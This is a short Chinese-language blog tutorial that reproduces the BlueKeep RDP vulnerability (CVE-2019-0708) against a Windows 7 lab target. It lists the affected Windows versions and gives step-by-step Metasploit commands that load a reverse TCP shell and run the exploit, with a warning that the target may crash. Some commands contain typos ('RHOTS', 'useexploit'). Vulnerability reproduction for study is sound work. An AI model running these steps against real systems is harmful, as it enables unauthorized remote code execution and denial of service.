一 漏洞介紹:
微軟公司于美國當地時間2019年5月14日發布重要安全公告,其作業系統遠程桌面(Remote Desktop Services),俗稱的3389服務存在嚴重安全漏洞(編號CVE-2019-0708):攻擊者在沒有任何授權的情況下(不需要用戶名和密碼),,成功利用此漏洞的攻擊者可以在目標系統上執行任意代碼,攻擊者可隨后安裝程式;查看、更改或洗掉資料;或者創建擁有完全用戶權限的新帳戶,
二 漏洞影響范圍:
Windows 7,windows-Server 2008 R2和Windows Server 2008,windows-Xp,windows 2003
三 漏洞復現:
(1) 環境準備:
a) 靶機: 我這里的靶機是Windows 7 64位 (6.1 版本7601)
b) 攻擊主機:Kali linux
(2) 漏洞攻擊
前提是windows 7需要開放了3389埠
(3) 打開kali,輸入 msfconsole
(4) 搜索cve_2019_0708 輸入: search cve_2019_0708
(6)我們選擇攻擊的模塊exploit進行攻擊 輸入:useexploit/windows/rdp/cve_2019_0708_bluekeep_rce
默認載入反彈tcp木馬
(7)設定攻擊的ip和本機的ip
輸入:
set RHOTS 目標ip
set LHOST 本機ip
show options //查看配置
set target 1 //設定攻擊者的架構
(8)開始攻擊:run
攻擊成功!
注意:該攻擊幾率會導致目標主機藍屏
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/249351.html
標籤:其他